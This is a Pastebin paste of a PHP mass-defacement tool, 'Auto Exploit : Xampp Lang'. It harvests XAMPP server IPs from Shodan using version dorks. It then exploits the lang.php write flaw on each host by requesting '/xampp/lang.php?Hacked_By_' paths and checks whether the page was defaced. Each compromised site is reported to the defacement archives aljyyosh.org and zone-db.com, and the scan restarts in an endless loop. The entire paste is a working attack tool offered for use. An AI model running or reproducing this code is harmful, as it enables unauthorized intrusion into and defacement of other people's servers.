Advertisement
shor7cut

Auto Exploit : Xampp Lang (Fix)

Jul 25th, 2015
690
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // SET API CTRL +  F = $api = " ";
  2. // <code> by shor7CUT
  3.  
  4. <?php
  5. error_reporting(0);
  6. set_time_limit(0);
  7.  
  8. date_default_timezone_set('asia/jakarta');
  9. logos();
  10. cari_target();
  11.  
  12. function cari_target() {
  13. $time = microtime(true);
  14. $dork = array (
  15. 'xampp',
  16. 'xampp Apache/2.2.3',
  17. 'xampp Apache/2.2.4',
  18. 'xampp Apache/2.2.6',
  19. 'xampp Apache/2.2.8',
  20. 'xampp Apache/2.2.9',
  21. 'xampp Apache/2.2.11',
  22. 'xampp Apache/2.2.12',
  23. 'xampp Apache/2.2.14',
  24. 'xampp Apache/2.2.17',
  25. 'xampp Apache/2.2.21',
  26. 'xampp Apache/2.4.2',
  27. 'xampp Apache/2.4.3',
  28. 'xampp Apache/2.4.10',
  29. 'xampp Apache/2.4.12',
  30. 'xampp PHP/5.2.1',
  31. 'xampp PHP/5.2.2',
  32. 'xampp PHP/5.2.3',
  33. 'xampp PHP/5.2.4',
  34. 'xampp PHP/5.2.5',
  35. 'xampp PHP/5.2.6',
  36. 'xampp PHP/5.2.8',
  37. 'xampp PHP/5.2.9',
  38. 'xampp PHP/5.3.0',
  39. 'xampp PHP/5.3.1',
  40. 'xampp PHP/5.3.5',
  41. 'xampp PHP/5.3.8',
  42. 'xampp PHP/5.4.4',
  43. 'xampp PHP/5.4.7',
  44. 'xampp PHP/5.4.31',
  45. 'xampp PHP/5.5.15',
  46. 'xampp PHP/5.5.19',
  47. 'xampp PHP/5.6.3',
  48. 'xampp PHP/5.5.24',
  49. 'xampp PHP/5.6.8',
  50. 'xampp PHP/4.4.5',
  51. 'xampp PHP/4.4.6',
  52. 'xampp PHP/4.4.7',
  53. 'xampp PHP/4.4.8',
  54. 'xampp PHP/4.4.9'
  55. );
  56. $api = " ";
  57. $hacker = "Shor7cut";
  58. $name_log = "lang_log_xampp_mirror_zonedb.txt";
  59. $name_target = "lang_target_xampp_mirror_zonedb.txt";
  60. $name_result = "lang_result_xampp_mirror_zonedb.html";
  61. $name_lapor = "Laporan.txt";
  62. $no_Scan=1;
  63. $tanggal_scan= date("d-m-Y h:i:s a");
  64. $jumlah_vuln=0;
  65. $jumlah_target_baru=0;
  66. $jumlah_submit_success=0;
  67. $jumlah_submit_success_zdb=0;
  68. $mulai_scan=date_default_timezone_set('asia/jakarta');
  69. $total_dork = count($dork);
  70. $no=1;
  71.  
  72.  
  73. // Hapus File \\
  74. unlink("$name_target");
  75. //
  76.     echo "\r\n|+> Total Dork : ".$total_dork."\r\n";
  77.     echo "|+> Memulai Mencari target\r\n";
  78.     loading();
  79. foreach ($dork as $dorks) {
  80.     $noms = "[".$no_Scan."/".$total_dork."]";
  81.     echo "|+> Mencari Target : ".$noms."\r\n|+> Scanned in ";
  82.     $get = file_get_contents("https://api.shodan.io/shodan/host/search?key={$api}&query={$dorks}");
  83.     $json = json_decode($get,true);
  84.  
  85. foreach ($json['matches'] as $key => $value) {
  86.  
  87.         $fp = fopen($name_target, 'a+');
  88.         fwrite($fp, $value['ip_str']."|");
  89.         fclose($fp);
  90.  
  91.     } // End Foreach
  92.     $target_live = $json['total'];
  93.         if($target_live>100){
  94.             $target_live=100;
  95.         }
  96.     $total_target=$target_live+$total_target;
  97.     echo ceil((microtime(true)-$time))." Detik\r\n|+> Found Target : [".$target_live."]\r\n\n";
  98.  
  99.     $no_Scan++;
  100. }
  101. echo "[+] Total Target : [".$total_target."]\r\n";
  102. $buka_file = fopen($name_target, "r");
  103. $baca_file = fgets($buka_file);
  104. $target = explode("|", $baca_file);
  105. echo "[+] Memulai Mencari vulnerable\r\n";
  106. loading()."\r\n\n";
  107. foreach ($target as $sites) {
  108. echo "-> Info : [".$no."/".$total_target."] : ".$sites."\r\n-> Status : "; //pesan
  109. $link1 = "$sites/xampp/lang.php?Hacked_By_$hacker";
  110. $link2 = "$sites/security/lang.php?Hacked_By_$hacker";
  111. $link1_result = "$sites/xampp/lang.tmp?";
  112. $link2_result = "$sites/security/lang.tmp?";
  113.  
  114. $xamppcurl = curl_init("$link1");
  115. curl_setopt($xamppcurl, CURLOPT_FAILONERROR, true);
  116. curl_setopt($xamppcurl, CURLOPT_FOLLOWLOCATION, true);
  117. curl_setopt($xamppcurl, CURLOPT_RETURNTRANSFER, true);
  118. curl_setopt($xamppcurl, CURLOPT_CONNECTTIMEOUT ,0);
  119. curl_setopt($xamppcurl, CURLOPT_TIMEOUT, 30);
  120. $result1 = curl_exec($xamppcurl);
  121.  
  122. $xamppcur2 = curl_init("$link2");
  123. curl_setopt($xamppcur2, CURLOPT_FAILONERROR, true);
  124. curl_setopt($xamppcur2, CURLOPT_FOLLOWLOCATION, true);
  125. curl_setopt($xamppcur2, CURLOPT_RETURNTRANSFER, true);
  126. curl_setopt($xamppcur2, CURLOPT_CONNECTTIMEOUT ,0);
  127. curl_setopt($xamppcur2, CURLOPT_TIMEOUT, 30);
  128. $result2 = curl_exec($xamppcur2);
  129.  
  130. if(eregi("Hacked_By_",$result1))
  131. {   echo "vulnerable\r\n";
  132.     $log = "http://$link1_result";
  133.     $hasil = '<a href="http://'.$link1_result.' target="_blank">http://'.$link1_result.'</a><br>';
  134.     $buka_file = fopen($name_log, "r"); // membaca file log
  135.     $baca_file = fgets($buka_file);
  136.        
  137.  
  138.         $buka_file = file_get_contents($name_log);
  139.   if(!eregi($sites, $buka_file)){
  140.         //save result
  141.         $fp = fopen($name_result, 'a+');
  142.         fwrite($fp, $hasil);
  143.         fclose($fp);
  144.         //save log
  145.         $fp = fopen($name_log, 'a+');
  146.         fwrite($fp, $sites."\r\n");
  147.         fclose($fp);
  148.         echo "-> Save-DB : Telah Ditambahkan\r\n";
  149.                 $jumlah_vuln++;
  150.                 $jumlah_target_baru++;
  151.   }else {
  152.         echo "-> Save-DB : Tidak Ditambahkan\r\n";
  153.   }
  154.                            
  155.        
  156.  
  157.  
  158.                 $cubit = curl_init ();
  159.                 curl_setopt ($cubit, CURLOPT_RETURNTRANSFER, 1);
  160.                 curl_setopt ($cubit, CURLOPT_POST, 1);
  161.                 curl_setopt ($cubit, CURLOPT_URL, "http://aljyyosh.org/single.php");
  162.                 curl_setopt ($cubit, CURLOPT_COOKIE, "alj=aljyyosh");
  163.                 curl_setopt ($cubit, CURLOPT_POSTFIELDS, "hacker=$hacker&site=$hasil&how=1&why=1&addsite=Send");
  164.                 if (preg_match ("/<font color=red> OK<\/font>/", curl_exec ($cubit))){
  165.                     echo "-> Submit Mirror [aljyyosh] : Success\r\n";
  166.                     $jumlah_submit_success++;
  167.                 }else {
  168.                     echo "-> Submit Mirror [aljyyosh] : Fail\r\n";
  169.                 }
  170.  
  171. $post = array(
  172. "hacker" => "$hacker",
  173. "team" => "IndoXploit",
  174. "url" => "$hasil",
  175. "poc" => "Other Web Application Bug",
  176. "key" => "kucing",
  177. "secret" => "tai",
  178. );
  179.     $cubits = curl_init ("http://zone-db.com/notify_act.php");
  180.     curl_setopt($cubits, CURLOPT_HEADER, 1);
  181.     curl_setopt($cubits, CURLOPT_FOLLOWLOCATION, 1);
  182.     curl_setopt($cubits, CURLOPT_RETURNTRANSFER, 1);
  183.     curl_setopt($cubits, CURLOPT_SSL_VERIFYPEER, 0);
  184.     curl_setopt($cubits, CURLOPT_SSL_VERIFYHOST, 0);
  185.     curl_setopt($cubits,CURLOPT_TIMEOUT,10);
  186.     curl_setopt($cubits,CURLOPT_USERAGENT, "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16");
  187.     curl_setopt($cubits, CURLOPT_AUTOREFERER, true);
  188.     curl_setopt($cubits, CURLOPT_COOKIEJAR, "coker_log");
  189.     curl_setopt($cubits, CURLOPT_COOKIEFILE, "coker_log");
  190.     $result_mirror = curl_exec($cubits);
  191.  
  192.                         if (preg_match("#added#is", $result_mirror)){
  193.                                 echo "-> Submit Mirror [zone-db] : Success\r\n\n";
  194.                                 $jumlah_submit_success++;
  195.                                 $jumlah_submit_success_zdb++;
  196.                         }else{
  197.                                 echo "-> Submit Mirror [zone-db] : Fail\r\n\n";
  198.                         }
  199.  
  200.  
  201.  
  202. }else if(eregi("Hacked_By_",$result2))
  203. {   echo "vulnerable\r\n";
  204.     $log = "http://$link2_result";
  205.     $hasil = '<a href="http://'.$link2_result.' target="_blank>http://'.$link2_result.'</a><br>';
  206.     $buka_file = fopen($name_log, "r"); // membaca file log
  207.     $baca_file = fgets($buka_file);
  208.                                        
  209.  
  210.         $buka_file = file_get_contents($name_log);
  211.      if(!eregi($sites, $buka_file)){
  212.         //save result
  213.         $fp = fopen($name_result, 'a+');
  214.         fwrite($fp, $hasil);
  215.         fclose($fp);
  216.         //save log
  217.         $fp = fopen($name_log, 'a+');
  218.         fwrite($fp, $sites."\r\n");
  219.         fclose($fp);
  220.         echo "-> Save-DB : Telah Ditambahkan\r\n";
  221.         $jumlah_vuln++;
  222.         $jumlah_target_baru++;
  223.     }else {
  224.         echo "-> Save-DB : Tidak Ditambahkan\r\n";
  225.     }
  226.  
  227.  
  228.  
  229.                                          $cubit = curl_init ();
  230.                                         curl_setopt ($cubit, CURLOPT_RETURNTRANSFER, 1);
  231.                                         curl_setopt ($cubit, CURLOPT_POST, 1);
  232.                                         curl_setopt ($cubit, CURLOPT_URL, "http://aljyyosh.org/single.php");
  233.                                         curl_setopt ($cubit, CURLOPT_COOKIE, "alj=aljyyosh");
  234.                                         curl_setopt ($cubit, CURLOPT_POSTFIELDS, "hacker=$hacker&site=$hasil&how=1&why=1&addsite=Send");
  235.                                         if (preg_match ("/<font color=red> OK<\/font>/", curl_exec ($cubit))){
  236.                                             echo "-> Submit Mirror [aljyyosh] : Success\r\n";
  237.                                             $jumlah_submit_success++;
  238.                                         }else {
  239.                                             echo "-> Submit Mirror [aljyyosh] : Fail\r\n";
  240.                                         }
  241.                                        
  242.  
  243.  
  244. $post = array(
  245. "hacker" => "$hacker",
  246. "team" => "IndoXploit",
  247. "url" => "$hasil",
  248. "poc" => "Other Web Application Bug",
  249. "key" => "kucing",
  250. "secret" => "tai",
  251. );
  252.     $cubits = curl_init ("http://zone-db.com/notify_act.php");
  253.     curl_setopt($cubits, CURLOPT_HEADER, 1);
  254.     curl_setopt($cubits, CURLOPT_FOLLOWLOCATION, 1);
  255.     curl_setopt($cubits, CURLOPT_RETURNTRANSFER, 1);
  256.     curl_setopt($cubits, CURLOPT_SSL_VERIFYPEER, 0);
  257.     curl_setopt($cubits, CURLOPT_SSL_VERIFYHOST, 0);
  258.     curl_setopt($cubits,CURLOPT_TIMEOUT,10);
  259.     curl_setopt($cubits,CURLOPT_USERAGENT, "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16");
  260.     curl_setopt($cubits, CURLOPT_AUTOREFERER, true);
  261.     curl_setopt($cubits, CURLOPT_COOKIEJAR, "coker_log");
  262.     curl_setopt($cubits, CURLOPT_COOKIEFILE, "coker_log");
  263.     $result_mirror = curl_exec($cubits);
  264.  
  265.                         if (preg_match("#added#is", $result_mirror)){
  266.                                 echo "-> Submit Mirror [zone-db] : Success\r\n\n";
  267.                                 $jumlah_submit_success++;
  268.                                 $jumlah_submit_success_zdb++;
  269.                         }else{
  270.                                 echo "-> Submit Mirror [zone-db] : Fail\r\n\n";
  271.                         }
  272.  
  273.  
  274.  
  275.  
  276. }else {
  277.     echo "not vulnerable\r\n\n";
  278.     }
  279.  
  280. $no++;
  281. } //end:foreach|sites
  282.         $lapor.= "\r\n------------[ZONE DB MIRROR]-----------------\r\n";
  283.         $lapor.= "-> Laporan : ".$tanggal_scan."\r\n";
  284.         $lapor.= "-> Total Target  : ".$total_target."\r\n";
  285.         $lapor.= "-> Total Database Baru : ".$jumlah_target_baru."\r\n";
  286.         $lapor.= "-> Total Success Submit aljyyosh/zone-db: ".$jumlah_submit_success."|".$jumlah_submit_success_zdb++."\r\n";
  287.         $lapor.= "-> Scan End : ".date("d-m-Y h:i:s a")."\r\n";
  288.         $lapor.= "\r\n-----------------------------\r\n";
  289.         echo $lapor;
  290.         $fp = fopen($name_lapor, 'a+');
  291.         fwrite($fp, $lapor);
  292.         fclose($fp);
  293.         reload_manunisi();
  294.     } //end:fungsi
  295.  
  296.                
  297.  
  298. function logos() {
  299. $logos.="  _________.__                _________               __    \r\n";
  300. $logos.=" /   _____/|  |__   __________\______  \ ____  __ ___/  |_  \r\n";
  301. $logos.=" \_____  \ |  |  \ /  _ \_  __ \  /    // ___\|  |  \   __\ \r\n";
  302. $logos.=" /        \|   Y  (  <_> )  | \/ /    /\  \___|  |  /|  |   \r\n";
  303. $logos.="/_______  /|___|  /\____/|__|   /____/  \___  >____/ |__|   \r\n";
  304. $logos.="        \/      \/                          \/              \r\n";
  305. $logos.="---------[ Auto Deface (Xampp Lang.php) by Shor7cut ]-------\r\n";
  306. echo $logos;
  307. }
  308. function reload_manunisi() {
  309. cari_target();
  310. }
  311.  
  312. function loading() {
  313.     echo "-> Pleas wait ";
  314. for ($i=0; $i <3; $i++) {
  315.         echo ".";
  316.         sleep(1);
  317.         echo " ";
  318.         sleep(1);
  319. }   echo "\r\n\n";
  320.     }
  321.  
  322.     ?>
Advertisement
RAW Paste Data Copied
Advertisement